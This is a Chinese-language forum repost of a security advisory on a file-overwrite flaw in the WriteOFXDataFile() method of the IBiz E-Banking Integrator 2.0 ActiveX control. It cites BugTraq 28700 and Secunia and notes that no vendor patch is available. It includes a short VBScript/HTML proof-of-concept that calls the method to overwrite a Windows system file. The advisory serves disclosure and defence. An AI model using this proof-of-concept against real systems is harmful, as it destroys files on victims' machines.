• 设为首页
  • 收藏本站
  • 积分充值
  • VIP赞助
  • 手机版
  • 微博
  • 微信
    微信公众号 添加方式:
    1:搜索微信号(888888
    2:扫描左侧二维码
  • 快捷导航
    福建二哥 门户 查看主题

    IBiz E-Banking Integrator ActiveX控件WriteOFXDataFile()不安全调用漏洞

    发布者: 火山休眠期 | 发布时间: 2025-6-28 22:54| 查看数: 111| 评论数: 0|帖子模式

    受影响系统:
    /n software IBiz E-Banking Integrator 2.0
    描述:
    --------------------------------------------------------------------------------
    BUGTRAQ  ID: 28700IBiz E-Banking Integrator是用于从银行、投资公司等帐号访问财务交易信息的解决方案。IBiz E-Banking Integrator所提供的IBizEBank.FIProfile.1 ActiveX控件(fiprofile20.ocx)没有正确地处理对WriteOFXDataFile()方式的调用,如果用户受骗访问了恶意网页的话,就可能导致以当前登录用户的权限覆盖和破坏系统上的任意文件。<*来源:shinnai (shinnai@autistici.org)
      
      链接:http://secunia.com/advisories/29758/
    *>测试方法:
    --------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!<object classid='clsid:24445430-F789-11CE-86F8-0020AFD8C6DB' id='test'></object><input language=VBScript onclick=tryMe() type=button value='Click here to start the test'><script language='vbscript'>
    Sub tryMe()
      On Error Resume Next
       test.WriteOFXDataFile "C:\WINDOWS\system_.ini"
       If Err.Number <> 0 Then
        MsgBox "Something went wrong!"
       Else
        MsgBox "Exploit Completed!"
       End If
    End Sub
    </script>建议:
    --------------------------------------------------------------------------------
    厂商补丁:/n software
    -----------
    目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:http://www.nsoftware.com/ibiz/ebank/default.aspx

    来源:https://www.jb51.net/hack/5412.html
    免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!

    最新评论

    QQ Archiver 手机版 小黑屋 福建二哥 ( 闽ICP备2022004717号|闽公网安备35052402000345号 )

    Powered by Discuz! X3.5 © 2001-2023

    快速回复 返回顶部 返回列表